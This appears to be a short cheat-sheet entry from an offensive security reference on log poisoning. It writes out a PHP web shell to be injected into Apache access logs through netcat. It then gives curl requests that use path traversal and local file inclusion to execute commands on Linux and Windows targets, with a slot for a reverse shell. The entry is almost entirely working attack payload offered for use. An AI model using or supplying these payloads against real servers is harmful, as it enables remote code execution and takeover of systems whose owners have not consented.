Log poisoning
#Poison logs with netcat
nc 10.10.10.14 80
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>'; ?>#Linux target
curl http://target.com/index.php?view=../../../var/log/apache2/access.log&cmd=INSERT REVSHELL HERE | BASH | PYTHON ... #Windows target
curl http://target.com/menu.php?file=c:\xamp\apache\logs\access.log&cmd=dirLast updated